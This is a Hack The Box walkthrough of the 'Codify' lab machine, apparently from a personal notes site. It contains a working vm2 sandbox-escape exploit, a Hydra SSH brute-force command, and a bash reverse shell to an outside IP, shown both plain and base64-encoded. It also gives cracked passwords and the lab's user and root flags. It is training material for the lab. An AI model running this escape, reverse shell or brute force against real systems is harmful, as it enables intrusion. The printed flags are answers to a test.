> For the complete documentation index, see [llms.txt](https://cybersec.th4ntis.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cybersec.th4ntis.com/hackthebox/walkthroughs/codify.md).

# Codify

## Initial Scan

```nmap
sudo nmap -T4 -v 10.129.82.199
sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify
```

<figure><img src="/files/dIl15dO8hxlRaU5CFhDC" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0TrLdkOyyNqildFRyBpt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/CzxcCvhlSfgXUYT6fUPC" alt=""><figcaption></figcaption></figure>

## HTTP

Had to edit the host file to get the Webpage

<figure><img src="/files/tsLJeupDyplnNMPajRRN" alt=""><figcaption></figcaption></figure>

Checking out their About Us page

<figure><img src="/files/w5Q6dPAFw1KefHGllypl" alt=""><figcaption></figcaption></figure>

Looking around for VM2 CVE's, found [this article on snyk](https://security.snyk.io/vuln/SNYK-JS-VM2-5537100) about RCE with VM2 after seeing a couple others. Testing the other PoC's I didn't get anywhere until I found this one. We can run commands on the host bypassing the VM.

```javascript
const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("ls -al").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked
```

<figure><img src="/files/64qPzCeWfohLfKm1XN02" alt=""><figcaption></figcaption></figure>

whoami shows us the `svc` user. Also looking at `/etc/passwd` we see an additional user, `joshua`&#x20;

<figure><img src="/files/zOB4iG9ZxbMDGMS7EaQR" alt=""><figcaption></figcaption></figure>

### BruteForce

Trying to run Hydra against the user joshua for a password

```bash
hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199
```

<figure><img src="/files/Lq7qHnUuoOPReDZuU2u2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5g47fRXLALB2Fyz3gxZu" alt=""><figcaption></figcaption></figure>

`joshua:spongebob1`

### Obtaining shell

Working to get a shall as svc. Looking around for reverse shell, I found [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp).

```bash
bash -i >& /dev/tcp/10.10.14.53/1234 0>&1
```

Running it normally didn't work so I encoded it

```
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash"
```

Full command

```bash
const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked
```

## Foothold

We have shell as svc

<figure><img src="/files/CbaNosFZi4RXhVotAOHa" alt=""><figcaption></figcaption></figure>

Seeing what permissions we have

<figure><img src="/files/4mz77sOGzBK88bp1Cx8L" alt=""><figcaption></figcaption></figure>

## User Flag

After getting into shell from the SVC user, I got Joshuas password with hydra.

<figure><img src="/files/dsP8MdRwNzV0WW8cBylw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/PW5Euhsh0ScHisVxWHFw" alt=""><figcaption></figcaption></figure>

User flag: `c53cdd4688463871ba3f4020ab6f3ccb`

## Priv Esc

<figure><img src="/files/rTtdcwnUgMJ3P0l7PM7w" alt=""><figcaption></figcaption></figure>

We have run the note of "User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh" So looking at the shell file

<figure><img src="/files/i5I1NBGhoeOBXAzsb5Yi" alt=""><figcaption></figcaption></figure>

Running that as root as get

<figure><img src="/files/z5hfqx6lwljXQwASD1hV" alt=""><figcaption></figcaption></figure>

Get [PSPY](https://github.com/DominicBreuker/pspy) Initiate another SSH session. Get pspy64 onto the target machine, run it, then run the `/opt/scripts/mysql-backup.sh` script

<figure><img src="/files/doBjsltHq9n58LSDuHMN" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1lwkvuJYuWMohDgnfcgP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VoDAHmH6bJNBBABdSJBr" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/qTZYodQVCtmafbrfnGuF" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZAoIPJF66ZsNqKoNbMct" alt=""><figcaption></figcaption></figure>

Root pass: `kljh12k3jhaskjh12kjh3`

<figure><img src="/files/Tq3fpYFhErP2Wq511UVE" alt=""><figcaption></figcaption></figure>

Root flag: `4e43f866588b3b3433196af3cef8b768`
